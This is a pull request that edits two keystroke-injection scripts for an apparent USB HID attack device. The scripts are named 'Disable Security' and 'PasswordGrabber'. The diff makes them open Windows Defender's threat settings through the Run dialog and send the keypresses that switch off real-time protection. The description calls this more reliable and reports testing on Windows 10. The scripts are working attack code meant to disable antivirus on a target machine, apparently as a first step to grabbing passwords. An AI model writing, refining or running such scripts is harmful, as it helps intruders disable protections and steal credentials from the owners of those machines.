### PR TITLE
Disable Security: Directly and reliably open Windows Defender

### DIFF
--- a/HIDScripts/Disable Security/Disable Security.js
+++ b/HIDScripts/Disable Security/Disable Security.js
@@ -1,32 +1,14 @@
 layout('us');
-press("GUI");
+press("GUI r");
 delay(500);
-type("windows security")
-delay(2500);
-press("ENTER");
-delay(600);
-press("TAB");
-delay(200);
-press("TAB");
-delay(200);
-press("DOWN");
+type("windowsdefender://ThreatSettings")
 delay(200);
 press("ENTER");
-delay(200);
-press("TAB");
-delay(200);
-press("TAB");
-delay(200);
-press("TAB");
-delay(200);
-press("TAB");
-delay(200);
-press("ENTER");
-delay(200);
+delay(1000);
 press("SPACE");
-delay(500);
+delay(1000);
 press("SHIFT TAB");
-delay(500);
+delay(200);
 press("ENTER");
 delay(500);
 press("ALT F4");

--- a/HIDScripts/PasswordGrabber/PasswordGrabber.js
+++ b/HIDScripts/PasswordGrabber/PasswordGrabber.js
@@ -1,32 +1,14 @@
 layout('us');
-press("GUI");
+press("GUI r");
 delay(500);
-type("windows security")
-delay(2500);
-press("ENTER");
-delay(600);
-press("TAB");
-delay(200);
-press("TAB");
-delay(200);
-press("DOWN");
+type("windowsdefender://ThreatSettings")
 delay(200);
 press("ENTER");
-delay(200);
-press("TAB");
-delay(200);
-press("TAB");
-delay(200);
-press("TAB");
-delay(200);
-press("TAB");
-delay(200);
-press("ENTER");
-delay(200);
+delay(1000);
 press("SPACE");
-delay(500);
+delay(1000);
 press("SHIFT TAB");
-delay(500);
+delay(200);
 press("ENTER");
 delay(500);
 press("ALT F4");


### PR DESCRIPTION
Instead of relying on windows search and keyboard navigation, this will directly open the defender tab and press "space" to toggle it.

Based on https://superuser.com/a/1625219

Tested on Windows 10 only